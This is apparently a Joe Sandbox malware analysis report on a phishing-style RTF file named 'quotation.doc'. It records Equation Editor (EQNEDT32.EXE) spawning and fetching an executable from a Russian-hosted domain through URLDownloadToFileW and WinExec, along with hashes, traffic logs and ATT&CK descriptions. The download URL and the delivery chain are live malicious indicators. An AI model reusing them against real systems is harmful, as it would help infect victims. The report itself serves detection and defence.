TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	quotation.doc
File size:	1'104'718 bytes
MD5:	290fce33014ad508c6a7e7cf17c2e991
SHA1:	beb0df0e8d7344d428ec63b7f820be08c50ad76a
SHA256:	241367cd4f08afe3402847a7ecbc5c83f54d1c3c3693d00ea6a103d7ed597a9b
SHA512:	3b895d26fb84d530f8336325f3732016831c908053016e53ee52e63f970075e855c06c031c4efdf6e359466676178daf2767709be412cbed7bd5ba0b312ec6ed
SSDEEP:	24576:vfEkPFVyCRA+aV9Y72BMAuoozsJnwbnDvg0P2o0FNfYsDvmLTq:U
TLSH:	A935BFF876047DD62A6F136BCA96ACDD13B61A639ACBA4CD806477C305A3375FE02C05
File Content Preview:	{\rtf1...........{\mcGp4857357 \[}.{\385454352\object21516869\objocx85192904\objw4845\objh2162{\objupdate39424213942421\\objdata393788{\\auldb4040177 \bin0000000\523498173665703113}.{\*\fUserDrawn941359336 \bin00000\371920104910354311}.bf554a1a020000000

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000083h								no

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2023 23:11:36.794719934 CEST	49163	80	192.168.2.22	141.8.197.42
Sep 14, 2023 23:11:36.998891115 CEST	80	49163	141.8.197.42	192.168.2.22
Sep 14, 2023 23:11:36.998984098 CEST	49163	80	192.168.2.22	141.8.197.42
Sep 14, 2023 23:11:37.002830982 CEST	49163	80	192.168.2.22	141.8.197.42
Sep 14, 2023 23:11:37.206782103 CEST	80	49163	141.8.197.42	192.168.2.22
Sep 14, 2023 23:11:37.207340956 CEST	80	49163	141.8.197.42	192.168.2.22
Sep 14, 2023 23:11:37.207408905 CEST	49163	80	192.168.2.22	141.8.197.42
Sep 14, 2023 23:11:37.207412004 CEST	80	49163	141.8.197.42	192.168.2.22
Sep 14, 2023 23:11:37.207459927 CEST	49163	80	192.168.2.22	141.8.197.42
Sep 14, 2023 23:11:37.207556009 CEST	49163	80	192.168.2.22	141.8.197.42
Sep 14, 2023 23:11:37.412945986 CEST	80	49163	141.8.197.42	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2023 23:11:36.306868076 CEST	52917	53	192.168.2.22	8.8.8.8
Sep 14, 2023 23:11:36.777415037 CEST	53	52917	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 14, 2023 23:11:36.306868076 CEST	192.168.2.22	8.8.8.8	0x926	Standard query (0)	a0862680.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 14, 2023 23:11:36.777415037 CEST	8.8.8.8	192.168.2.22	0x926	No error (0)	a0862680.xsph.ru		141.8.197.42	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

a0862680.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49163	141.8.197.42	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2023 23:11:37.002830982 CEST	1	OUT	GET /djlipantro2.1.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: a0862680.xsph.ru Connection: Keep-Alive
Sep 14, 2023 23:11:37.207340956 CEST	1	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 14 Sep 2023 21:11:37 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Target ID:	0
Start time:	23:11:33
Start date:	14/09/2023
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fee0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	23:11:34
Start date:	14/09/2023
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:11:54
Start date:	14/09/2023
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	55.6%
Total number of Nodes:	99
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02B66B4A Relevance: 3.1, APIs: 2, Instructions: 82
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(02B66B3C), ref: 02B66B4A

Part of subcall function 02B66B64: URLDownloadToFileW.URLMON(00000000,02B66B75,?,00000000,00000000), ref: 02B66BCB

Memory Dump Source

Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd

Similarity

API ID: DownloadFileLibraryLoad
String ID:
API String ID: 2776762486-0
Opcode ID: c32c991e46d75e9b8831d816618ae35a3fd0dc8ba44dbde99203679b3f3417fc
Instruction ID: 642028eeb3e9ef2d6767b13674fe8cdbd939947464dd8bada1a3ddd2b27deec9
Opcode Fuzzy Hash: c32c991e46d75e9b8831d816618ae35a3fd0dc8ba44dbde99203679b3f3417fc
Instruction Fuzzy Hash: AE217CA180C7C26FD722A7704D2EB65BF696B93604F1D8ACEA1C10A0E3A29C9105C767

Uniqueness

Uniqueness Score: -1.00%

Function 02B66C14 Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WinExec.KERNEL32(?,00000001), ref: 02B66C21

Part of subcall function 02B66C34: ExitProcess.KERNELBASE(00000000), ref: 02B66C39

Memory Dump Source

Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd

Similarity

API ID: ExecExitProcess
String ID:
API String ID: 4112423671-0
Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
Instruction ID: 91711e65ab7f940517ac04665415d8f50b9b0ef167af19fedf825ffba9083d7d
Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
Instruction Fuzzy Hash: 22F02299508A8212CB303724885D7BA2B6FEFA5318FC899D79A9188045D66CE0C3C619

Uniqueness

Uniqueness Score: -1.00%

Function 02B66AD6 Relevance: 1.6, APIs: 1, Instructions: 121
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,02B66B75,?,00000000,00000000), ref: 02B66BCB

Memory Dump Source

Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: c4f0c45c06c77ba7534c59ad10f5018062492aa266157aa7298a1fb34482a6d1
Instruction ID: a67e12ba7d7f2aa1c95219698d6a56d7c7ec3e105b0b783652897ec24abe8979
Opcode Fuzzy Hash: c4f0c45c06c77ba7534c59ad10f5018062492aa266157aa7298a1fb34482a6d1
Instruction Fuzzy Hash: E341C1A280D7C26FD722A7704D6EB65BF29AB53604F1DCACE91C50A0E3E39C9105C757

Uniqueness

Uniqueness Score: -1.00%

Function 02B66B64 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: fd1079497f7d2061c9caf18006afd60492d999edea779c3c971564c0b513ec8d
Instruction ID: 48a23cd8842a33ff277f394665eed1e58a65bbc714a642384348d18d3756daf8
Opcode Fuzzy Hash: fd1079497f7d2061c9caf18006afd60492d999edea779c3c971564c0b513ec8d
Instruction Fuzzy Hash: 31215BA280C3C26FD722A7704C2EB65BF655F93604F1DCACEA1C10E0E3E2AC9105C756

Uniqueness

Uniqueness Score: -1.00%

Function 02B66BC9 Relevance: 1.6, APIs: 1, Instructions: 58
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,02B66B75,?,00000000,00000000), ref: 02B66BCB

Memory Dump Source

Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
Instruction ID: bea3d98bbed28ca3dcd0d6a4274961228415c226ad81d84734f81fea8692582a
Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
Instruction Fuzzy Hash: AF118871508B426BCB24E750894DFBABBAFEB92710F50C1DAE640490C5E36CE482C229

Uniqueness

Uniqueness Score: -1.00%

Function 02B66C34 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(00000000), ref: 02B66C39

Memory Dump Source

Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02B66C3B Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: a314341c365df099c7bfa0b6717c6cccfe4c57876970b4459e2bc8ace50c432e
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: F5D09E71211902DFD305DF05D984E66F36BFFD4611B14D2A9D5044B619D738EC91CA94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02B66AA1 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(02B66A8F), ref: 02B66AA1

Memory Dump Source

Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 22cad5f1c2a3025732e40a056304bbea983aa5471109b1622f5e937056d2a4b5
Instruction ID: faba6aefda9aecca2796f3302f41ad8fb4ddc6f2dafffa7326060c24814f3a2a
Opcode Fuzzy Hash: 22cad5f1c2a3025732e40a056304bbea983aa5471109b1622f5e937056d2a4b5
Instruction Fuzzy Hash: 641126A640EBC29FC3126B701EAF1A5BF29BB1360431D85CFC1D44A1A3E35D960AC797

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report quotation.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6890EC98-DE75-44E9-BDEE-DE8CEDCD61AF}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{69E97219-69CA-4D6F-852C-7A88B9BFFFCF}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BB1AFCA5-5498-40FF-BC14-3D4DF358421D}.tmp

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\quotation.LNK

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$otation.doc

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Windows Analysis Report
quotation.doc

Function 02B66B4A Relevance: 3.1, APIs: 2, Instructions: 82
libraryCOMMON

Function 02B66C14 Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Function 02B66AD6 Relevance: 1.6, APIs: 1, Instructions: 121
filenetworkCOMMON

Function 02B66B64 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Function 02B66BC9 Relevance: 1.6, APIs: 1, Instructions: 58
filenetworkCOMMON

Function 02B66C34 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 02B66C3B Relevance: .0, Instructions: 14
COMMON

Function 02B66AA1 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON